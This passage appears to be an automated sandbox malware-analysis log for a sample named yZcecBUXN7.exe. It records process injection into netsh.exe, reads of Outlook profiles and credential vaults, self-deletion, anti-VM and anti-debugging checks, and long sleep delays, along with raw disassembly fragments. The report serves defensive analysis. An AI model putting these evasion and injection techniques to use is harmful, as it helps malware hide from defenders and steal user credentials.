            Source: C:\Users\user\Desktop\yZcecBUXN7.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeSection loaded: wldp.dll
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeSection loaded: amsi.dll
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeSection loaded: userenv.dll
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeSection loaded: profapi.dll
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeSection loaded: msasn1.dll
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeSection loaded: gpapi.dll
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeSection loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeSection loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeSection loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wininet.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: version.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netutils.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wldp.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: profapi.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: secur32.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mlang.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: propsys.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptbase.dll
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeSection loaded: wininet.dll
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeSection loaded: mswsock.dll
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeSection loaded: dnsapi.dll
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeSection loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeSection loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeSection loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Windows\SysWOW64\netsh.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: yZcecBUXN7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: yZcecBUXN7.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb source: yZcecBUXN7.exe, 00000000.00000002.1628173538.0000000005330000.00000004.08000000.00040000.00000000.sdmp, yZcecBUXN7.exe, 00000000.00000002.1626818477.0000000002A71000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: netsh.pdb source: yZcecBUXN7.exe, 00000001.00000002.1898532114.0000000000E28000.00000004.00000020.00020000.00000000.sdmp, yZcecBUXN7.exe, 00000001.00000002.1898532114.0000000000E41000.00000004.00000020.00020000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000002.4123319938.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000002.4123319938.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000000.1770920776.000000000004E000.00000002.00000001.01000000.00000007.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000000.1972232269.000000000004E000.00000002.00000001.01000000.00000007.sdmp
            Source: Binary string: wntdll.pdbUGP source: yZcecBUXN7.exe, 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000004.00000003.1897494718.0000000001227000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000004.00000003.1902030596.000000000358C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: netsh.pdbGCTL source: yZcecBUXN7.exe, 00000001.00000002.1898532114.0000000000E28000.00000004.00000020.00020000.00000000.sdmp, yZcecBUXN7.exe, 00000001.00000002.1898532114.0000000000E41000.00000004.00000020.00020000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000002.4123319938.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000002.4123319938.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: yZcecBUXN7.exe, yZcecBUXN7.exe, 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, netsh.exe, 00000004.00000003.1897494718.0000000001227000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000004.00000003.1902030596.000000000358C000.00000004.00000020.00020000.00000000.sdmp
            Source: yZcecBUXN7.exeStatic PE information: 0xCA00A32F [Sun May 23 23:50:07 2077 UTC]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0041A0EC push esi; retf
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0041133C push esp; retf
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_00408397 push esp; iretd
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_00413551 push eax; ret
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_004035E0 push eax; ret
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_00404E45 push ds; iretd
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_00404E1C push ds; iretd
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_00404E23 push ds; iretd
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_00404ECD push ds; iretd
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_004186EA push ebx; ret
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010D225F pushad ; ret
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010D27FA pushad ; ret
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011009AD push ecx; mov dword ptr [esp], ecx
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010D283D push eax; iretd
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010D1368 push eax; iretd
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037709AD push ecx; mov dword ptr [esp], ecx
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_03741350 push eax; iretd
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C16B14 push esi; retf
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C1CB14 push eax; iretd
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C04DB4 push esp; iretd
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C1B1BD push 00000049h; iretd
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C018EA push ds; iretd
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C01840 push ds; iretd
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C01862 push ds; iretd
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C01839 push ds; iretd
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C0D957 push ebx; retf
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C0FB80 push edi; iretd
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C11D56 push ds; ret
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C0DD59 push esp; retf
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C0FF6E push eax; ret
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C1FF2B push esi; retf
            Source: yZcecBUXN7.exeStatic PE information: section name: .text entropy: 7.633926656601929

            Hooking and other Techniques for Hiding and Protection

            barindex
            Deletes itself after installation
            Source: C:\Windows\SysWOW64\netsh.exeFile deleted: c:\users\user\desktop\yzcecbuxn7.exeJump to behavior
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Yara detected AntiVM3
            Source: Yara matchFile source: Process Memory Space: yZcecBUXN7.exe PID: 6640, type: MEMORYSTR
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeMemory allocated: CC0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeMemory allocated: 2A70000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeMemory allocated: 4A70000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0114096E rdtsc
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_00401D30 sldt word ptr [eax]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\netsh.exeWindow / User API: threadDelayed 1723
            Source: C:\Windows\SysWOW64\netsh.exeWindow / User API: threadDelayed 8248
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\netsh.exeAPI coverage: 2.3 %
            Source: C:\Users\user\Desktop\yZcecBUXN7.exe TID: 6744Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\netsh.exe TID: 3716Thread sleep count: 1723 > 30
            Source: C:\Windows\SysWOW64\netsh.exe TID: 3716Thread sleep time: -3446000s >= -30000s
            Source: C:\Windows\SysWOW64\netsh.exe TID: 3716Thread sleep count: 8248 > 30
            Source: C:\Windows\SysWOW64\netsh.exe TID: 3716Thread sleep time: -16496000s >= -30000s
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe TID: 2724Thread sleep time: -75000s >= -30000s
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe TID: 2724Thread sleep count: 31 > 30
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe TID: 2724Thread sleep time: -46500s >= -30000s
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe TID: 2724Thread sleep count: 37 > 30
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe TID: 2724Thread sleep time: -37000s >= -30000s
            Source: C:\Windows\SysWOW64\netsh.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\netsh.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C1B710 FindFirstFileW,FindNextFileW,FindClose,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeThread delayed: delay time: 922337203685477
            Source: jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123417601.000000000127F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllY
            Source: netsh.exe, 00000004.00000002.4123105715.0000000000F74000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2314438483.000001B1F3C9C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess information queried: ProcessInformation
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\netsh.exeProcess queried: DebugPort
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0114096E rdtsc
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_004172C3 LdrLoadDll,
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011AA118 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011AA118 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011AA118 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011AA118 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011C0115 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011AE10E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011AE10E mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011AE10E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011AE10E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011AE10E mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011AE10E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011AE10E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011AE10E mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011AE10E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011AE10E mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01130124 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01198158 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01106154 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01106154 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010FC156 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01194144 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01194144 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01194144 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01194144 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01194144 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011D4164 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011D4164 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0118019F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0118019F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0118019F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0118019F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01140185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011BC188 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011BC188 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010FA197 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010FA197 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010FA197 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011A4180 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011A4180 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0117E1D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0117E1D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0117E1D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0117E1D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0117E1D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011C61C3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011C61C3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011301F8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011D61E5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0111E016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0111E016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0111E016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0111E016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01184000 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011A2000 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011A2000 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011A2000 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011A2000 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011A2000 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011A2000 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011A2000 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011A2000 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01196030 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010FA020 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010FC020 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01102050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01186050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0112C073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0110208A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011C60B8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011C60B8 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010F80A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011980A8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011820DE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011420F0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010FA0E3 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011860E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011080E9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010FC0F0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01120310 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113A30B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113A30B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113A30B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010FC310 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011D8324 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011D8324 mov ecx, dword ptr fs:[00000030h]
